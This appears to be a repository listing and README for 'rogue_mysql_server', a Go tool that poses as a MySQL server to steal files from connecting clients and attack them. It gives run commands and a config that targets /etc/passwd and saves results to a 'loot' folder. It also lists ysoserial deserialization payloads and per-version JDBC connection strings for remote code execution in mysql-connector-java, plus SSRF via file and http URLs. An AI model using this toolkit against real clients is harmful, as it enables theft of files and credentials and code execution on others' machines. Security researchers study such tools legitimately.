rogue_mysql_server

Category: MySQL database
Development tool: Go
File size: 181KB
Downloads: 0
Upload date: 2022-12-02 06:32:26
Uploader: sh-1993
Description: A rogue MySQL server that supports reading files from most MySQL libraries of multiple programming languages.

File list:
LICENSE.txt (1062, 2022-12-02)
Makefile (122, 2022-12-02)
config.yaml (503, 2022-12-02)
go.mod (562, 2022-12-02)
go.sum (10245, 2022-12-02)
loot (0, 2022-12-02)
main.go (10490, 2022-12-02)
mysql (0, 2022-12-02)
mysql\auth_server.go (7922, 2022-12-02)
mysql\auth_server_none.go (1948, 2022-12-02)
mysql\auth_server_static.go (10744, 2022-12-02)
mysql\auth_server_static_test.go (9746, 2022-12-02)
mysql\binlog_event.go (10075, 2022-12-02)
mysql\binlog_event_common.go (11318, 2022-12-02)
mysql\binlog_event_common_test.go (12493, 2022-12-02)
mysql\binlog_event_json.go (16107, 2022-12-02)
mysql\binlog_event_json_test.go (6161, 2022-12-02)
mysql\binlog_event_make.go (14126, 2022-12-02)
mysql\binlog_event_make_test.go (11670, 2022-12-02)
mysql\binlog_event_mariadb.go (2606, 2022-12-02)
mysql\binlog_event_mariadb_test.go (12965, 2022-12-02)
mysql\binlog_event_mysql56.go (2917, 2022-12-02)
mysql\binlog_event_mysql56_test.go (5644, 2022-12-02)
mysql\binlog_event_rbr.go (39522, 2022-12-02)
mysql\binlog_event_rbr_test.go (20012, 2022-12-02)
mysql\binlog_event_test.go (1824, 2022-12-02)
mysql\charset.go (3195, 2022-12-02)
mysql\client.go (23620, 2022-12-02)
mysql\client_test.go (4442, 2022-12-02)
mysql\conn.go (37933, 2022-12-02)
mysql\conn_params.go (1986, 2022-12-02)
mysql\conn_test.go (9785, 2022-12-02)
... ...

# Rogue Mysql Server

[English README](https://github.com/rmb122/rogue_mysql_server/blob/master/./README_EN.md)

https://github.com/vitessio/vitess

MySQL libraries for go, php, python, java:

| language | library                        | pass |
|----------|--------------------------------|------|
| go       | github.com/go-sql-driver/mysql | ✔    |
| php      | mysqli, pdo                    | ✔    |
| python   | pymysql                        | ✔    |
| java     | mysql-connector-java           | ✔    |
| native   | 10.4.13-MariaDB                | ✔    |

## Features

* ConnAttr
* mysql-connector-java: RCE

## Usage

```sh
./rogue_mysql_server -generate
```

With config.yaml:

```sh
./rogue_mysql_server
```

```sh
./rogue_mysql_server -config other_config.yaml
```

## Configuration

```yaml
host: 0.0.0.0
port: 3306

version_string: "10.4.13-MariaDB-log"

file_list: ["/etc/passwd", "C:/boot.ini"]
save_path: ./loot

always_read: true
# LOAD DATA LOCAL

from_database_name: false
# Example: `jdbc:mysql://localhost:3306/%2fetc%2fhosts?allowLoadLocalInfile=true`
# (`/etc/hosts`, `file_list`)

max_file_size: 0
# Unit: byte. Special case: <= 0.

auth: false
users:
  - root: root
  - root: password

jdbc_exploit: false
always_exploit: false
ysoserial_command:
  cc4: ["java", "-jar", "ysoserial-0.0.6-SNAPSHOT-all.jar", "CommonsCollections4", 'touch /tmp/cc4']
  cc7: ["java", "-jar", "ysoserial-0.0.6-SNAPSHOT-all.jar", "CommonsCollections7", 'touch /tmp/cc7']
```

## mysql-connector-java

Versions >= 8.0.20, >= 5.1.49:

https://github.com/mysql/mysql-connector-j/commit/de7e1af306ffbb8118125a8659***f***ee5b35b1b
https://github.com/mysql/mysql-connector-j/commit/13f06c38fb68757607c460789196e3f7***d506f2

mysql-connector-java configuration:

```yaml
jdbc_exploit: false
always_exploit: false
ysoserial_command:
  cc4: ["java", "-jar", "ysoserial-0.0.6-SNAPSHOT-all.jar", "CommonsCollections4", 'touch /tmp/cc4']
  cc7: ["java", "-jar", "ysoserial-0.0.6-SNAPSHOT-all.jar", "CommonsCollections7", 'touch /tmp/cc7']
```

`ysoserial_command`: payloads. The `connectionAttributes` entry `t` names the payload, as in `connectionAttributes=t:{payload_name}`.

For 8.x with cc7:

`jdbc:mysql://127.0.0.1:3306/test?connectionAttributes=t:cc7&autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=root&password=password`

The `com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor` parameter differs by version:

| version  | jdbc connection string |
|----------|------------------------|
| 8.x      | jdbc:mysql://127.0.0.1:3306/test?connectionAttributes=t:{payload_name}&autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=root&password=password |
| 6.x      | jdbc:mysql://127.0.0.1:3306/test?connectionAttributes=t:{payload_name}&autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=root&password=password |
| >=5.1.11 | jdbc:mysql://127.0.0.1:3306/test?connectionAttributes=t:{payload_name}&autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=root&password=password |

mysql-connector-java also handles `file://` and http URLs (SSRF) when, in addition to `allowLoadLocalInfile` being true, `allowUrlInLocalInfile` is true; see [source](https://github.com/mysql/mysql-connector-j/blob/dd61577595edad45c3***af508cf91ad26fc4144f/src/main/protocol-impl/java/com/mysql/cj/protocol/a/NativeProtocol.java#L1877). E.g.

* `/`: `jdbc:mysql://127.0.0.1:3306/file%3A%2F%2F%2F?allowLoadLocalInfile=true&allowUrlInLocalInfile=true`
* SSRF `http://127.0.0.1:25565`: `jdbc:mysql://127.0.0.1:3306/http%3A%2F%2F127.0.0.1:25565?allowLoadLocalInfile=true&allowUrlInLocalInfile=true`

## Ref

mysql-connector-java:

https://github.com/fnmsd/MySQL_Fake_Server

mysql:

https://github.com/mysql/mysql-connector-j
https://github.com/vitessio/vitess
https://github.com/src-d/go-mysql-server
http://scz.617.cn:8/network/202001101612.txt
